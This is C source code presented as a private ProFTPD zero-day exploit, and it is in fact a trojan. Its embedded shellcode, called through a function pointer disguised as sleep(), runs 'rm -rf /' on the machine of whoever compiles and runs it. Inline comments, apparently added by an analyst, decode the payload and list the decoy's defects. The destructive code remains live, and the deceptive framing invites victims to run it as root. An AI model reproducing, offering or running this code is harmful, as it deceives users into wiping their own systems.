Ladies and gentlemen, here's the source code of the exploit for the latest release of ProFTPD. This is a Zero-Day private exploit, please DON'T REDISTRIBUTE. I will not take responsibility for any damages which could result from the usage of this exploit, use it at your own risk.
-------------------------------------------------------------------------- /*
Example of use: # gcc exploit.c -o exploit # ./exploit 192.168.1.1 21 Connected on 192.168.1.1:21 Exploitation in progress... Exploitation string sent. Trying to connect, please wait... Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown unknown GNU/Linux uid=0(root) gid=0(root) groupes=0(root)
*/
#include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <unistd.h> #include <netdb.h>
/* byte used to pad the overflow buffer (x86 NOP) */
#define NOP 0x90
/* Value sprayed over the buffer as the "return address".  0x6675636b is the
 * ASCII bytes 'f' 'u' 'c' 'k' ("kcuf" in little-endian memory): it is not a
 * plausible stack address, which is one of several signs that this program
 * is a decoy rather than an exploit. */
#define RET 0x6675636b
/* NOT a bind shell.  Decoded (x86-32 Linux), these bytes:
 *   - push the strings "/bin/sh", "-c" and "rm -rf /" onto the stack and
 *     NUL-terminate them (the 0x88 0x44 0x24 .. stores),
 *   - build argv = {"/bin/sh", "-c", "rm -rf /", NULL} and a NULL envp,
 *   - issue int 0x80 with eax = 11 (execve), then int 0x80 with eax = 1 (exit).
 * Nothing here listens on a port.  The only place these bytes are executed is
 * main(), which calls them as a function in its own process, i.e. on the
 * machine of whoever compiles and runs this program.  Treat the file as a
 * trojan: its payload deletes the local filesystem (the usage example runs
 * it from a root prompt). */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
/* resolve(): host name -> IPv4 address (network byte order), exits on failure */
unsigned long resolve(char *hostname);
/* give_me_a_shell(): interactive relay to TCP port 1337 on dest */
int give_me_a_shell(unsigned long dest);
/*
 * Entry point.  argv[1] = host, argv[2] = port (default 21).
 *
 * What this function actually does, in order: fills a 1024-byte buffer with
 * NOPs, copies sc[] to offset 700 and RET repeatedly from offset 815, sends
 * only a handful of bytes to the target, and then -- under the guise of
 * waiting for a bind shell -- calls the sc[] bytes as a function in its own
 * process.  sc[] decodes to execve("/bin/sh", {"/bin/sh","-c","rm -rf /"},
 * NULL), so the program wipes the filesystem of the machine it is run on;
 * the remote host receives nothing harmful.  The defects that corroborate
 * this reading are commented inline.
 *
 * @return 0 on usage error or "success", -1 on any socket error.  Control
 *         never comes back from the sleep(5) call below (see there).
 */
int main(int argc, char *argv[])
{
    int i, *ret;            /* ret is never used */
    char *string;
    unsigned long addr;
    char buffer[1024];
    int port=21, fd, s;
    struct sockaddr_in addy;

    if(argc < 2)
    {
        fprintf(stdout, "usage: %s <host> <port>\n", argv[0]);
        return(0);
    }else addr=resolve(argv[1]);
    /* argv[argc] is NULL, so testing argv[2] with argc == 2 is safe */
    if(argv[2]) port=atoi(argv[2]);

    /* Fill the whole buffer with NOPs.  No byte of buffer[] is ever 0 after
     * this (NOP, sc[] and RET contain no zero bytes), so the strlen() and
     * sprintf("%s") calls on it below read past the end of the array. */
    memset(buffer, NOP, 1024);
    /* copy the shellcode to the buffer (offsets 700..) */
    for(i=0; i < strlen(sc); i++)
        buffer[i+700]=sc[i];
    /* spray RET over offsets 815..1002, four bytes at a time (unaligned
     * int stores) */
    for(i=815; i<1003; i+=4)
        *((int *)&buffer[i]) = RET;
    /* strlen(buffer) is undefined here (no terminator, see above).  The
     * prefix bytes are the ASCII "LOVE ", which is not an FTP command. */
    string = (char *) malloc(strlen(buffer)+20);
    sprintf(string, "\x4c\x4f\x56\x45 %s", buffer);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if(fd < 0)
    {
        fprintf(stderr, "unable to socket()\n");
        return(-1);
    }
    addy.sin_family = AF_INET;
    addy.sin_addr.s_addr = addr;
    addy.sin_port = htons(port);
    /* connect to remote host */
    if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0)
    {
        fprintf(stderr, "unable to connect()\n");
        return(-1);
    }
    printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port);
    printf("Exploitation in progress...\n");
    /* sizeof(string) is the size of a pointer (4 or 8 bytes), not the length
     * of the string: only the first 4 (or 8) bytes, i.e. "LOVE" and at most
     * a few NOPs, are ever transmitted.  Also, `s = send(...) < 0` parses as
     * `s = (send(...) < 0)`, so s holds 0 or 1, never the byte count. */
    if(s = send(fd, string, sizeof(string), 0) < 0)
    {
        fprintf(stderr, "unable to send()\n");
        return(-1);
    }
    close(fd);
    printf("Exploitation string sent.\n");
    free(string);

    printf("Trying to connect, please wait...\n");
    /* THE PAYLOAD.  This is not libc sleep(): it declares a local function
     * pointer *named* sleep, points it at the sc[] byte array and calls it,
     * which executes the embedded machine code inside this process on the
     * machine running ./exploit.  Those bytes execve /bin/sh -c "rm -rf /"
     * and then exit, so nothing after this line ever runs.  On a system
     * whose data segment is non-executable (NX / W^X) the call would most
     * likely fault instead. */
    void(*sleep)()=(void*)sc;
    sleep(5);

    /* unreachable in practice; also, nothing in this program ever opens
     * port 1337 on the target, which is where give_me_a_shell() connects */
    if(give_me_a_shell(addr) < 0)
    {
        fprintf(stderr, "Sorry, exploit didn't work.\n");
        return(-1);
    }
    return(0);
}
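/*
 * Resolve a host name or dotted-quad string to an IPv4 address.
 *
 * @param sname  host name or numeric address string to look up.
 * @return the address in network byte order (the value of
 *         struct in_addr.s_addr) widened to unsigned long.
 *
 * Exits the process with status 1 when the lookup fails or when the
 * answer is not a 4-byte IPv4 record.  The original returned
 * *(unsigned long *)h_addr, which reads sizeof(unsigned long) bytes
 * (8 on LP64 hosts) out of a 4-byte record and assumes the record is
 * suitably aligned; the copy below is bounded by h_length and byte-wise.
 */
unsigned long resolve(char *sname)
{
    struct hostent *hip = gethostbyname(sname);
    struct in_addr a;
    unsigned char *dst = (unsigned char *)&a;
    int i;

    if (!hip) {
        fprintf(stderr, "unable to find %s\n", sname);
        exit(1);
    }
    /* gethostbyname() can return non-IPv4 records depending on resolver
     * configuration; only an AF_INET record of exactly sizeof(struct in_addr)
     * bytes can be returned through this interface. */
    if (hip->h_addrtype != AF_INET || hip->h_length != (int)sizeof a
        || hip->h_addr_list[0] == NULL) {
        fprintf(stderr, "%s: no IPv4 address\n", sname);
        exit(1);
    }
    /* byte-wise copy: h_addr_list[0] carries no alignment guarantee, and
     * memcpy() is not declared by the headers this file includes */
    for (i = 0; i < hip->h_length; i++) {
        dst[i] = (unsigned char)hip->h_addr_list[0][i];
    }
    return a.s_addr;
}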
/*
 * Interactive relay to a remote shell expected on TCP port 1337 of the host
 * whose IPv4 address (network byte order) is addr.  Sends "uname -a && id",
 * then forwards stdin to the socket and socket data to stderr until the user
 * types "quit" or an error occurs.
 *
 * Within this file nothing ever opens port 1337 on the target (sc[] is not a
 * bind shell) and main() executes sc[] locally before reaching this call, so
 * the function is effectively dead code.  Defects are noted inline anyway.
 *
 * @return 0 when the user quits, -1 on socket/connect/select/recv failure.
 */
int give_me_a_shell(unsigned long addr)
{
    int sock;
    fd_set fds;
    struct sockaddr_in shell;
    unsigned char buf[4096];
    char cmd[]="uname -a && id";

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock < 0)
    {
        fprintf(stderr, "unable to socket()\n");
        return(-1);
    }
    shell.sin_family = AF_INET;
    shell.sin_port = htons(1337);
    shell.sin_addr.s_addr = addr;
    if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0)
    {
        fprintf(stderr, "unable to connect()\n");
        close(sock);
        return(-1);
    }
    /* return value unchecked; a short send is silently ignored */
    send(sock, cmd, strlen(cmd), 0);
    while(1)
    {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);
        /* nfds should be sock+1; the constant 255 only works while sock < 255 */
        if(select(255, &fds, NULL, NULL, NULL) == -1)
        {
            fprintf(stderr, "unable to select()\n");
            close(sock);
            return(-1);
        }
        memset(buf, 0, sizeof(buf));
        if(FD_ISSET(sock, &fds))
        {
            /* recv() == 0 (peer closed) is not handled: the socket stays
             * readable, so the loop spins printing an empty buffer.  A full
             * 4096-byte read leaves buf without a NUL terminator, so the
             * "%s" below then reads past the array. */
            if(recv(sock, buf, sizeof(buf), 0) < 0)
            {
                fprintf(stderr, "unable to recv()\n");
                close(sock);
                return(-1);
            }
            /* "%s" stops at the first NUL; remote output goes to stderr */
            fprintf(stderr, "%s", buf);
        }
        if(FD_ISSET(0, &fds))
        {
            /* return value unchecked; same unterminated-buffer issue as
             * recv().  Terminal line input normally keeps its '\n', so typing
             * "quit" yields "quit\n" and the comparison below never matches. */
            read(0, buf, sizeof(buf));
            if(!strcmp(buf, "quit"))
            {
                close(sock);
                return(0);
            }
            /* return value unchecked */
            write(sock, buf, strlen(buf));
        }
    }
}
--------------------------------------------------------------------------
Have fun ! @+
